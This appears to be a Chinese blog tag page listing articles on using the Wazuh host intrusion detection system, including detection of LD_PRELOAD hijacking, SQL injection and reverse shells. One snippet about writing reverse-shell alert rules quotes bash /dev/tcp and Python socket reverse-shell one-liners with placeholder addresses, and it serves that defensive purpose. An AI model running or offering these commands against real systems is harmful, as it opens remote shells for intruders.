wauzh

使用WAZUH检测LD_PRELAOD劫持、SQL注入、主动响应防御

.chkrootkit2.rkhunter手动检查文件检查ld.so.preload文件2、检测LD_PRELOADubuntu配置wazuh配置3、检测SQL注入ubuntu配置攻击模拟4、主动响应wauzh
未知百分百·2024-01-01 18:16

开源HIDS-Wauzh功能测试

一、Wazuh守护进程及工具进程守护进程ossec-agentdhttps://documentation.wazuh.com/3.10/user-manual/reference/daemons/ossec-agentd.htmlossec-agentd程序是与服务器通信的客户端守护进程。它作为ossec运行,并被chrootedto/var/ossec。ossec-agentlessdhttp
Hudi233·2023-10-21 16:26

开源HIDS-Wauzh测试使用

Wazuh简介前端时间调研了一些HIDS的开源系统:https://github.com/Neo23x0/Fenrir更加方便(不需要安装代理或者软件包)使用的IOC扫描工具https://github.com/ysrc/yulong-hids由Agent,Daemon,Server和Web四个部分组成的服务器入侵检测系统https://github.com/InQuest/awesome-yar
Hudi233·2023-09-30 08:00

wazuh环境配置及漏洞复现

目录一.wazuh环境配置1.官网下载ova文件(wauzh.com)编辑2.傻瓜式安装即可(跟liunx安装一样)3.查看主机ip4.启动小皮,访问wazuh仪表盘编辑二.漏洞复现1.wazuh初体验
星辰不遇烟火·2023-08-27 10:32

Wauzh自定义反弹shell告警规则

常见反弹:bash-i>&/dev/tcp/ip/port0>&1python-c"importos,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fil
Hudi233·2023-06-11 03:11

Wauzh原理简析及audit规则风险评估

HIDS基本原理熟悉HIDS的朋友应该了解,服务器的shell监控一般有两种,一种依靠Linux的audit审计功能,比如Wazuh,一种是重编译和替换bash二进制文件,将shell上执行的命令实时通过socket传递到服务端。前一种方法优点是记录完整,缺点是会产生大量的日志,以及audit.rules配置失误的话导致服务器宕机。后一种方式虽然日志简洁,但如果通过命令远程执行漏洞不走服务器的sh
Hudi233·2020-01-06 17:32
上一页 1 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他